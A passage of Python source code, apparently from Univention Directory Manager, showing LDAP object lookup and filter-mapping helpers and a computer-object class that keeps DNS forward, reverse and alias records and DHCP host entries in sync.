matches.\n :param bool required: Raise an exception instead of returning an empty dictionary.\n :param int timeout: wait at most `timeout` seconds for a search to complete. `-1` for no limit.\n :param int sizelimit: retrieve at most `sizelimit` entries for a search. `0` for no limit.\n :param serverctrls: a list of :py:class:`ldap.controls.LDAPControl` instances sent to the server along with the LDAP request.\n :type serverctrls: list[ldap.controls.LDAPControl]\n :param dict response: An optional dictionary to receive the server controls of the result.\n :return: A list of UDM objects.\n :rtype: list[simpleLdap]\n \"\"\"\n filter_s = cls.lookup_filter(filter_s, lo)\n if superordinate:\n filter_s = cls.lookup_filter_superordinate(filter_s, superordinate)\n filter_str = six.text_type(filter_s or u'')\n attr = cls._ldap_attributes()\n result = []\n for dn, attrs in lo.search(filter_str, base, scope, attr, unique, required, timeout, sizelimit, serverctrls=serverctrls, response=response):\n try:\n result.append(cls(co, lo, None, dn=dn, superordinate=superordinate, attributes=attrs))\n except univention.admin.uexceptions.base as exc:\n ud.debug(ud.ADMIN, ud.ERROR, 'lookup() of object %r failed: %s' % (dn, exc))\n if required and not result:\n raise univention.admin.uexceptions.noObject('lookup(base=%r, filter_s=%r)' % (base, filter_s))\n return result\n\n @classmethod\n def lookup_filter(cls, filter_s=None, lo=None): # type: (Optional[str], Optional[univention.admin.uldap.access]) -> univention.admin.filter.conjunction\n \"\"\"\n Return a LDAP filter as a UDM filter expression.\n\n :param str filter_s: LDAP filter string.\n :param univention.admin.uldap.access lo: UDM LDAP access object.\n :returns: A LDAP filter expression.\n :rtype: univention.admin.filter.conjunction\n\n See :py:meth:`lookup`.\n \"\"\"\n filter_p = cls.unmapped_lookup_filter()\n # there are instances where the lookup/lookup_filter method of an module handler is called before\n # univention.admin.modules.update() was performed. (e.g. management/univention-directory-manager-modules/univention-dnsedit)\n module = univention.admin.modules.get_module(cls.module)\n filter_p.append_unmapped_filter_string(filter_s, cls.rewrite_filter, module.mapping)\n return filter_p\n\n @classmethod\n def lookup_filter_superordinate(cls, filter, superordinate):\n return filter\n\n @classmethod\n def unmapped_lookup_filter(cls): # type: () -> univention.admin.filter.conjunction\n \"\"\"\n Return a LDAP filter UDM filter expression.\n\n :returns: A LDAP filter expression.\n :rtype: univention.admin.filter.conjunction\n\n See :py:meth:`lookup_filter`.\n \"\"\"\n filter_conditions = []\n if cls.use_performant_ldap_search_filter:\n filter_conditions.append(univention.admin.filter.expression(u'univentionObjectType', cls.module, escape=True))\n else:\n object_classes = univention.admin.modules.options(cls.module).get(u'default', univention.admin.option()).objectClasses - {u'top', u'univentionPolicy', u'univentionObjectMetadata', u'person'}\n filter_conditions.extend(univention.admin.filter.expression(u'objectClass', ocs) for ocs in object_classes)\n\n return univention.admin.filter.conjunction(u'&', filter_conditions)\n\n @classmethod\n def rewrite_filter(cls, filter, mapping):\n key = filter.variable\n\n try:\n should_map = mapping.shouldMap(key)\n except KeyError:\n should_map = False\n\n if should_map:\n filter.variable = mapping.mapName(key)\n\n if filter.operator == '=*':\n # 1. presence match. We only need to change the variable name. value is not set\n # 2. special case for syntax classes IStates and boolean:\n # properties that are represented as Checkboxes in the\n # frontend should include '(!(propertyName=*))' in the ldap filter\n # if the Checkbox is set to False to also find objects where the property\n # is not set. In that case we don't want to map the '*' to a different value.\n return\n\n # management/univention-management-console/src/univention/management/console/acl.py does not call univention.admin.modules.update()\n mod = univention.admin.modules.get_module(cls.module)\n property_ = mod.property_descriptions.get(key)\n\n # map options to corresponding objectClass\n if not property_ and key == 'options' and filter.value in getattr(mod, 'options', {}):\n ocs = mod.options[filter.value]\n filter.variable = u'objectClass'\n if len(ocs.objectClasses) > 1:\n con = univention.admin.filter.conjunction(u'&', [univention.admin.filter.expression(u'objectClass', oc, escape=True) for oc in ocs.objectClasses])\n filter.transform_to_conjunction(con)\n elif ocs.objectClasses:\n filter.value = list(ocs.objectClasses)[0] # noqa: RUF015\n return\n\n if not should_map:\n return\n\n if property_ and not isinstance(filter.value, (list, tuple)):\n if property_.multivalue:\n # special case: mutlivalue properties need to be a list when map()-ing\n filter.value = [filter.value]\n if issubclass(property_.syntax if inspect.isclass(property_.syntax) else type(property_.syntax), univention.admin.syntax.complex):\n # special case: complex syntax properties need to be a list (of lists, if multivalue)\n filter.value = [filter.value]\n\n filter.value = mapping.mapValueDecoded(key, filter.value, encoding_errors='ignore')\n\n if isinstance(filter.value, (list, tuple)) and filter.value:\n # complex syntax\n filter.value = filter.value[0]\n\n @classmethod\n def identify(cls, dn, attr, canonical=False):\n ocs = {x.decode('utf-8') for x in attr.get('objectClass', [])}\n required_object_classes = univention.admin.modules.options(cls.module).get('default', univention.admin.option()).objectClasses - {'top', 'univentionPolicy', 'univentionObjectMetadata', 'person'}\n return (ocs & required_object_classes) == required_object_classes\n\n _static_ldap_attributes = set() # type: Set[str]\n\n @classmethod\n def _ldap_attributes(cls): # type: () -> List[str]\n \"\"\"Get a list of additional (operational) LDAP attributes which needs to be fetched from the LDAP server when creating an instance of this object\"\"\"\n return list({'*', 'entryUUID', 'entryCSN', 'modifyTimestamp'} | cls._static_ldap_attributes)\n\n\nclass simpleComputer(simpleLdap):\n\n def __init__(self, co, lo, position, dn='', superordinate=None, attributes=[]):\n simpleLdap.__init__(self, co, lo, position, dn, superordinate, attributes)\n\n self.newPrimaryGroupDn = 0\n self.oldPrimaryGroupDn = 0\n self.ip = []\n self.network_object = False\n self.old_network = 'None'\n self.__saved_dhcp_entry = None\n # read-only attribute containing the FQDN of the host\n self.descriptions['fqdn'] = univention.admin.property(\n short_description='FQDN',\n long_description='',\n syntax=univention.admin.syntax.string,\n may_change=False,\n )\n self['dnsAlias'] = [] # defined here to avoid pseudo non-None value of [''] in modwizard search\n self.oldinfo['ip'] = []\n self.info['ip'] = []\n if self.exists():\n ips = [ip_address(addr.decode('ASCII')).exploded for key in ('aRecord', 'aAAARecord') for addr in self.oldattr.get(key, [])]\n self.oldinfo['ip'] += ips\n self.info['ip'] += ips\n\n def getMachineSid(self, lo, position, uidNum, rid=None):\n # if rid is given, use it regardless of s4 connector\n if rid:\n searchResult = self.lo.search(filter='objectClass=sambaDomain', attr=['sambaSID'])\n domainsid = searchResult[0][1]['sambaSID'][0].decode('ASCII')\n sid = domainsid + u'-' + rid\n return self.request_lock('sid', sid)\n else:\n # if no rid is given, create a domain sid or local sid if connector is present\n if self.s4connector_present:\n return u'S-1-4-%s' % uidNum\n else:\n num = uidNum\n while True:\n try:\n return self.request_lock('sid+user', num)\n except univention.admin.uexceptions.noLock:\n num = str(int(num) + 1)\n\n # HELPER\n @classmethod\n def _ip_from_ptr(cls, zoneName, relativeDomainName): # type: (str, str) -> str\n \"\"\"\n Extract IP address from reverse DNS record.\n\n >>> simpleComputer._ip_from_ptr(\"2.1.in-addr.arpa\", \"4.3\")\n '1.2.3.4'\n >>> simpleComputer._ip_from_ptr(\"0.0.0.0.0.0.0.0.0.8.b.d.1.0.0.2.ip6.arpa\", \"1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0\")\n '2001:db80:0000:0000:0000:0000:0000:0001'\n \"\"\"\n if 'ip6' in zoneName:\n return cls._ipv6_from_ptr(zoneName, relativeDomainName)\n else:\n return cls._ipv4_from_ptr(zoneName, relativeDomainName)\n\n @staticmethod\n def _ipv4_from_ptr(zoneName, relativeDomainName): # type: (str, str) -> str\n \"\"\"\n Extract IPv4 address from reverse DNS record.\n\n >>> simpleComputer._ipv4_from_ptr(\"2.1.in-addr.arpa\", \"4.3\")\n '1.2.3.4'\n \"\"\"\n return '%s.%s' % (\n '.'.join(reversed(zoneName.replace('.in-addr.arpa', '').split('.'))),\n '.'.join(reversed(relativeDomainName.split('.'))))\n\n @staticmethod\n def _ipv6_from_ptr(zoneName, relativeDomainName): # type: (str, str) -> str\n \"\"\"\n Extract IPv6 address from reverse DNS record.\n\n >>> simpleComputer._ipv6_from_ptr(\"0.0.0.0.0.0.0.0.0.8.b.d.1.0.0.2.ip6.arpa\", \"1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0\")\n '2001:db80:0000:0000:0000:0000:0000:0001'\n \"\"\"\n fullName = relativeDomainName + '.' + zoneName.replace('.ip6.arpa', '')\n digits = fullName.split('.')\n blocks = [''.join(reversed(digits[i:i + 4])) for i in range(0, len(digits), 4)]\n return ':'.join(reversed(blocks))\n\n @staticmethod\n def _is_ip(ip): # type: (str) -> bool\n \"\"\"\n Check if valid IPv4 (0.0.0.0 is allowed) or IPv6 address.\n\n :param ip: string.\n :returns: `True` if it is a valid IPv4 or IPv6 address., `False` otherwise.\n\n >>> simpleComputer._is_ip('192.0.2.0')\n True\n >>> simpleComputer._is_ip('::1')\n True\n >>> simpleComputer._is_ip('')\n False\n \"\"\"\n try:\n ip_address(u'%s' % (ip,))\n ud.debug(ud.ADMIN, ud.INFO, 'IP[%s]? -> Yes' % ip)\n return True\n except ValueError:\n ud.debug(ud.ADMIN, ud.INFO, 'IP[%s]? -> No' % ip)\n return False\n\n def open(self):\n \"\"\"Load the computer object from LDAP.\"\"\"\n simpleLdap.open(self)\n\n self.newPrimaryGroupDn = 0\n self.oldPrimaryGroupDn = 0\n self.ip_alredy_requested = 0\n self.ip_freshly_set = False\n\n self.__multiip = len(self['mac']) > 1 or len(self['ip']) > 1\n\n self['dnsEntryZoneForward'] = []\n self['dnsEntryZoneReverse'] = []\n self['dhcpEntryZone'] = []\n self['groups'] = []\n self['dnsEntryZoneAlias'] = []\n\n # search forward zone and insert into the object\n if self['name']:\n tmppos = univention.admin.uldap.position(self.position.getDomain())\n zones = []\n\n searchFilter = filter_format('(&(objectClass=dNSZone)(relativeDomainName=%s)(!(cNAMERecord=*)))', [self['name']])\n try:\n result = self.lo.search(base=tmppos.getBase(), scope='domain', filter=searchFilter, attr=['zoneName', 'aRecord', 'aAAARecord'], unique=False)\n for dn, attr in result:\n zoneName = attr['zoneName'][0].decode('UTF-8')\n for key in ('aRecord', 'aAAARecord'):\n if key in attr:\n zones.append((zoneName, [ip_address(x.decode('ASCII')).exploded for x in attr[key]]))\n\n ud.debug(ud.ADMIN, ud.INFO, 'zoneNames: %s' % zones)\n for zoneName, ips in zones:\n searchFilter = filter_format('(&(objectClass=dNSZone)(zoneName=%s)(relativeDomainName=@))', [zoneName])\n results = self.lo.searchDn(base=tmppos.getBase(), scope='domain', filter=searchFilter, unique=False)\n for dn in results:\n for ip in ips:\n self['dnsEntryZoneForward'].append([dn, ip])\n ud.debug(ud.ADMIN, ud.INFO, 'dnsEntryZoneForward: %s' % (self['dnsEntryZoneForward'],))\n except univention.admin.uexceptions.insufficientInformation:\n self['dnsEntryZoneForward'] = []\n raise\n\n for zoneName, ips in zones:\n searchFilter = filter_format('(&(objectClass=dNSZone)(|(PTRRecord=%s)(PTRRecord=%s.%s.)))', (self['name'], self['name'], zoneName))\n try:\n results = self.lo.search(base=tmppos.getBase(), scope='domain', attr=['relativeDomainName', 'zoneName'], filter=searchFilter, unique=False)\n for dn, attr in results:\n ip = self._ip_from_ptr(attr['zoneName'][0].decode('UTF-8'), attr['relativeDomainName'][0].decode('UTF-8'))\n if not self._is_ip(ip):\n ud.debug(ud.ADMIN, ud.WARN, 'simpleComputer: dnsEntryZoneReverse: invalid IP address generated: %r' % (ip,))\n continue\n entry = [self.lo.parentDn(dn), ip]\n if entry not in self['dnsEntryZoneReverse']:\n self['dnsEntryZoneReverse'].append(entry)\n except univention.admin.uexceptions.insufficientInformation:\n self['dnsEntryZoneReverse'] = []\n raise\n ud.debug(ud.ADMIN, ud.INFO, 'simpleComputer: dnsEntryZoneReverse: %s' % self['dnsEntryZoneReverse'])\n\n for zoneName, ips in zones:\n searchFilter = filter_format('(&(objectClass=dNSZone)(|(cNAMERecord=%s)(cNAMERecord=%s.%s.)))', (self['name'], self['name'], zoneName))\n try:\n results = self.lo.search(base=tmppos.getBase(), scope='domain', attr=['relativeDomainName', 'cNAMERecord', 'zoneName'], filter=searchFilter, unique=False)\n for dn, attr in results:\n dnsAlias = attr['relativeDomainName'][0].decode('UTF-8')\n self['dnsAlias'].append(dnsAlias)\n dnsAliasZoneContainer = self.lo.parentDn(dn)\n if attr['cNAMERecord'][0].decode('UTF-8') == self['name']:\n dnsForwardZone = attr['zoneName'][0].decode('UTF-8')\n else:\n dnsForwardZone = zoneName\n\n entry = [dnsForwardZone, dnsAliasZoneContainer, dnsAlias]\n if entry not in self['dnsEntryZoneAlias']:\n self['dnsEntryZoneAlias'].append(entry)\n except univention.admin.uexceptions.insufficientInformation:\n self['dnsEntryZoneAlias'] = []\n raise\n ud.debug(ud.ADMIN, ud.INFO, 'simpleComputer: dnsEntryZoneAlias: %s' % self['dnsEntryZoneAlias'])\n\n for macAddress in self['mac']:\n # mac address may be an empty string (Bug #21958)\n if not macAddress:\n continue\n\n ud.debug(ud.ADMIN, ud.INFO, 'open: DHCP; we have a mac address: %s' % macAddress)\n ethernet = 'ethernet ' + macAddress\n searchFilter = filter_format('(&(dhcpHWAddress=%s)(objectClass=univentionDhcpHost))', (ethernet,))\n ud.debug(ud.ADMIN, ud.INFO, 'open: DHCP; we search for \"%s\"' % searchFilter)\n try:\n results = self.lo.search(base=tmppos.getBase(), scope='domain', attr=['univentionDhcpFixedAddress'], filter=searchFilter, unique=False)\n ud.debug(ud.ADMIN, ud.INFO, 'open: DHCP; the result: \"%s\"' % results)\n for dn, attr in results:\n service = self.lo.parentDn(dn)\n if 'univentionDhcpFixedAddress' in attr:\n for ip in attr['univentionDhcpFixedAddress']:\n entry = (service, ip.decode('ASCII'), macAddress)\n if entry not in self['dhcpEntryZone']:\n self['dhcpEntryZone'].append(entry)\n else:\n entry = (service, '', macAddress)\n if entry not in self['dhcpEntryZone']:\n self['dhcpEntryZone'].append(entry)\n ud.debug(ud.ADMIN, ud.INFO, 'open: DHCP; self[ dhcpEntryZone ] = \"%s\"' % self['dhcpEntryZone'])\n\n except univention.admin.uexceptions.insufficientInformation:\n raise\n\n if self.exists():\n if self.has_property('network'):\n self.old_network = self['network']\n\n # get groupmembership\n self['groups'] = self.lo.searchDn(base=self.lo.base, filter=filter_format('(&(objectclass=univentionGroup)(uniqueMember=%s))', [self.dn]))\n\n if 'name' in self.info and 'domain' in self.info:\n self.info['fqdn'] = '%s.%s' % (self['name'], self['domain'])\n\n def __modify_dhcp_object(self, position, mac, ip=None):\n # identify the dhcp object with the mac address\n\n name = self['name']\n ud.debug(ud.ADMIN, ud.INFO, '__modify_dhcp_object: position: \"%s\"; name: \"%s\"; mac: \"%s\"; ip: \"%s\"' % (position, name, mac, ip))\n if not all((name, mac)):\n return\n\n ethernet = 'ethernet %s' % mac\n bip = ip.encode('ASCII') if ip else b''\n\n tmppos = univention.admin.uldap.position(self.position.getDomain())\n if not position:\n ud.debug(ud.ADMIN, ud.WARN, 'could not access network object and given position is \"None\", using LDAP root as position for DHCP entry')\n position = tmppos.getBase()\n results = self.lo.search(base=position, scope='domain', attr=['univentionDhcpFixedAddress'], filter=filter_format('dhcpHWAddress=%s', [ethernet]), unique=False)\n\n if not results:\n # if the dhcp object doesn't exists, then we create it\n # but it is possible, that the hostname for the dhcp object is already used, so we use the _uv$NUM extension\n\n ud.debug(ud.ADMIN, ud.INFO, 'the dhcp object with the mac address \"%s\" does not exists, we create one' % ethernet)\n\n results = self.lo.searchDn(base=position, scope='domain', filter=filter_format('(&(objectClass=univentionDhcpHost)(|(cn=%s)(cn=%s_uv*)))', (name, name)), unique=False)\n if results:\n ud.debug(ud.ADMIN, ud.INFO, 'the host \"%s\" already has a dhcp object, so we search for the next free uv name' % (name))\n RE = re.compile(r'cn=[^,]+_uv(\\d+),')\n taken = {int(m.group(1)) for m in (RE.match(dn) for dn in results) if m}\n n = min(set(range(max(taken) + 2)) - taken) if taken else 0\n name = '%s_uv%d' % (name, n)\n\n dn = 'cn=%s,%s' % (escape_dn_chars(name), position)\n ml = [\n ('objectClass', [b'top', b'univentionObject', b'univentionDhcpHost']),\n ('univentionObjectType', [b'dhcp/host']),\n ('cn', [name.encode('UTF-8')]),\n ('dhcpHWAddress', [ethernet.encode('ASCII')]),\n ]\n if ip:\n ml.append(('univentionDhcpFixedAddress', [bip]))\n self.lo.add(dn, ml)\n ud.debug(ud.ADMIN, ud.INFO, 'we just added the object \"%s\"' % (dn,))\n elif ip:\n # if the object already exists, we append or remove the ip address\n ud.debug(ud.ADMIN, ud.INFO, 'the dhcp object with the mac address \"%s\" exists, we change the ip' % ethernet)\n for dn, attr in results:\n if bip in attr.get('univentionDhcpFixedAddress', []):\n continue\n self.lo.modify(dn, [('univentionDhcpFixedAddress', b'', bip)])\n ud.debug(ud.ADMIN, ud.INFO, 'we added the ip \"%s\"' % ip)\n\n def __rename_dns_object(self, position=None, old_name=None, new_name=None):\n for dns_line in self['dnsEntryZoneForward']:\n # dns_line may be the empty string\n if not dns_line:\n continue\n dn, ip = self.__split_dns_line(dns_line)\n if ':' in ip: # IPv6\n results = self.lo.searchDn(base=dn, scope='domain', filter=filter_format('(&(relativeDomainName=%s)(aAAARecord=%s))', (old_name, ip)), unique=False)\n else:\n results = self.lo.searchDn(base=dn, scope='domain', filter=filter_format('(&(relativeDomainName=%s)(aRecord=%s))', (old_name, ip)), unique=False)\n for result in results:\n object = univention.admin.objects.get(univention.admin.modules.get('dns/host_record'), self.co, self.lo, position=self.position, dn=result)\n object.open()\n object['name'] = new_name\n object.modify()\n for dns_line in self['dnsEntryZoneReverse']:\n # dns_line may be the empty string\n if not dns_line:\n continue\n dn, ip = self.__split_dns_line(dns_line)\n results = self.lo.searchDn(base=dn, scope='domain', filter=filter_format('(|(pTRRecord=%s)(pTRRecord=%s.*))', (old_name, old_name)), unique=False)\n for result in results:\n object = univention.admin.objects.get(univention.admin.modules.get('dns/ptr_record'), self.co, self.lo, position=self.position, dn=result)\n object.open()\n object['ptr_record'] = [ptr_record.replace(old_name, new_name) for ptr_record in object.get('ptr_record', [])]\n object.modify()\n for entry in self['dnsEntryZoneAlias']:\n # entry may be the empty string\n if not entry:\n continue\n dnsforwardzone, dnsaliaszonecontainer, alias = entry\n results = self.lo.searchDn(base=dnsaliaszonecontainer, scope='domain', filter=filter_format('relativedomainname=%s', [alias]), unique=False)\n for result in results:\n object = univention.admin.objects.get(univention.admin.modules.get('dns/alias'), self.co, self.lo, position=self.position, dn=result)\n object.open()\n object['cname'] = '%s.%s.' % (new_name, dnsforwardzone)\n object.modify()\n\n def __rename_dhcp_object(self, old_name, new_name):\n module = univention.admin.modules.get('dhcp/host')\n tmppos = univention.admin.uldap.position(self.position.getDomain())\n for mac in self['mac']:\n # mac may be the empty string\n if not mac:\n continue\n ethernet = 'ethernet %s' % mac\n\n results = self.lo.searchDn(base=tmppos.getBase(), scope='domain', filter=filter_format('dhcpHWAddress=%s', [ethernet]), unique=False)\n if not results:\n continue\n ud.debug(ud.ADMIN, ud.INFO, 'simpleComputer: filter [ dhcpHWAddress = %s ]; results: %s' % (ethernet, results))\n\n for result in results:\n object = univention.admin.objects.get(module, self.co, self.lo, position=self.position, dn=result)\n object.open()\n object['host'] = object['host'].replace(old_name, new_name)\n object.modify()\n\n def __remove_from_dhcp_object(self, mac=None, ip=None):\n # if we got the mac address, then we remove the object\n # if we only got the ip address, we remove the ip address\n\n ud.debug(ud.ADMIN, ud.INFO, 'we should remove a dhcp object: mac=\"%s\", ip=\"%s\"' % (mac, ip))\n\n dn = None\n\n tmppos = univention.admin.uldap.position(self.position.getDomain())\n if ip and mac:\n ethernet = 'ethernet %s' % mac\n ud.debug(ud.ADMIN, ud.INFO, 'we only remove the ip \"%s\" from the dhcp object' % ip)\n results = self.lo.search(base=tmppos.getBase(), scope='domain', attr=['univentionDhcpFixedAddress'], filter=filter_format('(&(dhcpHWAddress=%s)(univentionDhcpFixedAddress=%s))', (ethernet, ip)), unique=False)\n for dn, _attr in results:\n object = univention.admin.objects.get(univention.admin.modules.get('dhcp/host'), self.co, self.lo, position=self.position, dn=dn)\n object.open()\n if ip in object['fixedaddress']:\n ud.debug(ud.ADMIN, ud.INFO, 'fixedaddress: \"%s\"' % object['fixedaddress'])\n object['fixedaddress'].remove(ip)\n if len(object['fixedaddress']) == 0:\n object.remove()\n else:\n object.modify()\n dn = object.dn\n\n elif mac:\n ethernet = 'ethernet %s' % mac\n ud.debug(ud.ADMIN, ud.INFO, 'Remove the following mac: ethernet: \"%s\"' % ethernet)\n results = self.lo.search(base=tmppos.getBase(), scope='domain', attr=['univentionDhcpFixedAddress'], filter=filter_format('dhcpHWAddress=%s', [ethernet]), unique=False)\n for dn, _attr in results:\n ud.debug(ud.ADMIN, ud.INFO, '... done')\n object = univention.admin.objects.get(univention.admin.modules.get('dhcp/host'), self.co, self.lo, position=self.position, dn=dn)\n object.remove()\n dn = object.dn\n\n elif ip:\n ud.debug(ud.ADMIN, ud.INFO, 'Remove the following ip: \"%s\"' % ip)\n results = self.lo.search(base=tmppos.getBase(), scope='domain', attr=['univentionDhcpFixedAddress'], filter=filter_format('univentionDhcpFixedAddress=%s', [ip]), unique=False)\n for dn, _attr in results:\n ud.debug(ud.ADMIN, ud.INFO, '... done')\n object = univention.admin.objects.get(univention.admin.modules.get('dhcp/host'), self.co, self.lo, position=self.position, dn=dn)\n object.remove()\n dn = object.dn\n\n return dn\n\n def __split_dhcp_line(self, entry):\n service = entry[0]\n ip = ''\n try:\n # sanitize mac address\n # 0011.2233.4455 -> 00:11:22:33:44:55 -> is guaranteed to work together with our DHCP server\n # __split_dhcp_line may be used outside of UDM which means that MAC_Address.parse may not be called.\n mac = univention.admin.syntax.MAC_Address.parse(entry[-1])\n if self._is_ip(entry[-2]):\n ip = entry[-2]\n except univention.admin.uexceptions.valueError:\n mac = ''\n return (service, ip, mac)\n\n def __split_dns_line(self, entry):\n zone = entry[0]\n ip = self._is_ip(entry[1]) and entry[1] or None if len(entry) > 1 else None\n\n ud.debug(ud.ADMIN, ud.INFO, 'Split entry %s into zone %s and ip %s' % (entry, zone, ip))\n return (zone, ip)\n\n def __remove_dns_reverse_object(self, name, dnsEntryZoneReverse, ip): # type: (str, str, str) -> None\n def modify(rdn, zoneDN): # type: (Text, str) -> None\n zone_name = explode_rdn(zoneDN, True)[0]\n for dn, attributes in self.lo.search(scope='domain', attr=['pTRRecord'], filter=filter_format('(&(relativeDomainName=%s)(zoneName=%s))', (rdn, zone_name))):\n ptr_records = attributes.get('pTRRecord', [])\n removals = []\n if len(ptr_records) > 1:\n removals = [b'%s.%s.' % (name.encode('UTF-8'), attributes2['zoneName'][0]) for dn2, attributes2 in self.lo.search(scope='domain', attr=['zoneName'], filter=filter_format('(&(relativeDomainName=%s)(objectClass=dNSZone))', [name]), unique=False)]\n\n if len(ptr_records) <= 1 or set(ptr_records) == set(removals):\n self.lo.delete('relativeDomainName=%s,%s' % (escape_dn_chars(rdn), zoneDN))\n else:\n self.lo.modify(dn, [('pTRRecord', removals, b'')])\n\n zone = univention.admin.handlers.dns.reverse_zone.object(self.co, self.lo, self.position, zoneDN)\n zone.open()\n zone.modify()\n\n ud.debug(ud.ADMIN, ud.INFO, 'we should remove a dns reverse object: dnsEntryZoneReverse=\"%s\", name=\"%s\", ip=\"%s\"' % (dnsEntryZoneReverse, name, ip))\n if dnsEntryZoneReverse:\n try:\n rdn = self.calc_dns_reverse_entry_name(ip, dnsEntryZoneReverse)\n except ValueError:\n pass\n else:\n modify(rdn, dnsEntryZoneReverse)\n\n elif ip:\n tmppos = univention.admin.uldap.position(self.position.getDomain())\n results = self.lo.search(base=tmppos.getBase(), scope='domain', attr=['zoneDn'], filter=filter_format('(&(objectClass=dNSZone)(|(pTRRecord=%s)(pTRRecord=%s.*)))', (name, name)), unique=False)\n for dn, _attr in results:\n ud.debug(ud.ADMIN, ud.INFO, 'DEBUG: dn: \"%s\"' % dn)\n zone = self.lo.parentDn(dn)\n ud.debug(ud.ADMIN, ud.INFO, 'DEBUG: zone: \"%s\"' % zone)\n try:\n rdn = self.calc_dns_reverse_entry_name(ip, zone)\n ud.debug(ud.ADMIN, ud.INFO, 'DEBUG: rdn: \"%s\"' % rdn)\n modify(rdn, zone)\n except ValueError as ex:\n ud.debug(ud.ADMIN, ud.INFO, 'DEBUG: rdn: \"%s\"' % ex)\n except univention.admin.uexceptions.noObject:\n pass\n\n def __add_dns_reverse_object(self, name, zoneDn, ip): # type: (str, str, str) -> None\n ud.debug(ud.ADMIN, ud.INFO, 'we should create a dns reverse object: zoneDn=\"%s\", name=\"%s\", ip=\"%s\"' % (zoneDn, name, ip))\n if not all((name, zoneDn, ip)):\n return\n\n addr, attr = self._ip2dns(ip)\n try:\n ipPart = self.calc_dns_reverse_entry_name(ip, zoneDn)\n except ValueError:\n raise univention.admin.uexceptions.missingInformation(_('Reverse zone and IP address are incompatible.'))\n\n tmppos = univention.admin.uldap.position(self.position.getDomain())\n results = self.lo.search(base=tmppos.getBase(), scope='domain', attr=['zoneName'], filter=filter_format('(&(relativeDomainName=%s)(zoneName=*)(%s=%s))', (name, attr, addr.exploded)), unique=False)\n hostname_list = {\n u'%s.%s.' % (name, attr['zoneName'][0].decode('UTF-8'))\n for dn, attr in results\n }\n if not hostname_list:\n ud.debug(ud.ADMIN, ud.ERROR, 'Could not determine host record for name=%r, ip=%r. Not creating pointer record.' % (name, ip))\n return\n\n results = self.lo.searchDn(base=tmppos.getBase(), scope='domain', filter=filter_format('(&(relativeDomainName=%s)(%s=%s))', [ipPart] + list(str2dn(zoneDn)[0][0][:2])), unique=False)\n if not results:\n self.lo.add('relativeDomainName=%s,%s' % (escape_dn_chars(ipPart), zoneDn), [\n ('objectClass', [b'top', b'dNSZone', b'univentionObject']),\n ('univentionObjectType', [b'dns/ptr_record']),\n ('zoneName', [explode_rdn(zoneDn, True)[0].encode('UTF-8')]),\n ('relativeDomainName', [ipPart.encode('ASCII')]),\n ('PTRRecord', [x.encode('UTF-8') for x in hostname_list]),\n ])\n\n # update Serial\n zone = univention.admin.handlers.dns.reverse_zone.object(self.co, self.lo, self.position, zoneDn)\n zone.open()\n zone.modify()\n\n def __remove_dns_forward_object(self, name, zoneDn, ip=None): # type: (str, str, str) -> None\n ud.debug(ud.ADMIN, ud.INFO, 'we should remove a dns forward object: zoneDn=\"%s\", name=\"%s\", ip=\"%s\"' % (zoneDn, name, ip))\n if name:\n # check if dns forward object has more than one ip address\n if not ip:\n if zoneDn:\n self.lo.delete('relativeDomainName=%s,%s' % (escape_dn_chars(name), zoneDn))\n zone = univention.admin.handlers.dns.forward_zone.object(self.co, self.lo, self.position, zoneDn)\n zone.open()\n zone.modify()\n else:\n if zoneDn:\n base = zoneDn\n else:\n tmppos = univention.admin.uldap.position(self.position.getDomain())\n base = tmppos.getBase()\n ud.debug(ud.ADMIN, ud.INFO, 'search base=\"%s\"' % base)\n if ':' in ip:\n ip = IPv6Address(u'%s' % (ip,)).exploded\n (attrEdit, attrOther) = ('aAAARecord', 'aRecord')\n else:\n (attrEdit, attrOther) = ('aRecord', 'aAAARecord')\n results = self.lo.search(base=base, scope='domain', attr=['aRecord', 'aAAARecord'], filter=filter_format('(&(relativeDomainName=%s)(%s=%s))', (name, attrEdit, ip)), unique=False, required=False)\n for dn, attr in results:\n if [x.decode('ASCII') for x in attr[attrEdit]] == [ip] and not attr.get(attrOther): # the to be removed is the last on the object\n # remove the object\n self.lo.delete(dn)\n else:\n # remove only the ip address attribute\n new_ip_list = copy.deepcopy(attr[attrEdit])\n new_ip_list.remove(ip.encode('ASCII'))\n\n self.lo.modify(dn, [(attrEdit, attr[attrEdit], new_ip_list)])\n\n zone = zoneDn or self.lo.parentDn(dn)\n zone = univention.admin.handlers.dns.forward_zone.object(self.co, self.lo, self.position, zone)\n zone.open()\n zone.modify()\n\n def __add_related_ptrrecords(self, zoneDN, ip): # type: (str, str) -> None\n if not all((zoneDN, ip)):\n return\n ptrrecord = '%s.%s.' % (self.info['name'], explode_rdn(zoneDN, True)[0])\n ip_split = ip.split('.')\n ip_split.reverse()\n search_filter = filter_format('(|(relativeDomainName=%s)(relativeDomainName=%s)(relativeDomainName=%s))', (ip_split[0], '.'.join(ip_split[:1]), '.'.join(ip_split[:2])))\n\n for dn, _attributes in self.lo.search(base=zoneDN, scope='domain', attr=['pTRRecord'], filter=search_filter):\n self.lo.modify(dn, [('pTRRecord', '', ptrrecord)])\n\n def __remove_related_ptrrecords(self, zoneDN, ip): # type: (str, str) -> None\n ptrrecord = '%s.%s.' % (self.info['name'], explode_rdn(zoneDN, True)[0])\n ip_split = ip.split('.')\n ip_split.reverse()\n search_filter = filter_format('(|(relativeDomainName=%s)(relativeDomainName=%s)(relativeDomainName=%s))', (ip_split[0], '.'.join(ip_split[:1]), '.'.join(ip_split[:2])))\n\n for dn, attributes in self.lo.search(base=zoneDN, scope='domain', attr=['pTRRecord'], filter=search_filter):\n if ptrrecord in attributes['pTRRecord']:\n self.lo.modify(dn, [('pTRRecord', ptrrecord, '')])\n\n def check_common_name_length(self): # type: () -> None\n ud.debug(ud.ADMIN, ud.INFO, 'check_common_name_length with self[\"ip\"] = %r and self[\"dnsEntryZoneForward\"] = %r' % (self['ip'], self['dnsEntryZoneForward']))\n if len(self['ip']) > 0 and len(self['dnsEntryZoneForward']) > 0:\n for zone in self['dnsEntryZoneForward']:\n if zone == '':\n continue\n zoneName = explode_rdn(zone[0], True)[0]\n if len(zoneName) + len(self['name']) >= 63:\n ud.debug(ud.ADMIN, ud.INFO, 'simpleComputer: length of Common Name is too long: %d' % (len(zoneName) + len(self['name']) + 1))\n raise univention.admin.uexceptions.commonNameTooLong()\n\n @staticmethod\n def _ip2dns(addr): # type: (str) -> Tuple[Union[IPv4Address, IPv6Address], str]\n \"\"\"\n Convert IP address string to 2-tuple (IPAddress, LdapAttributeName).\n\n :param addr: an IPv4 or IPv6 address.\n 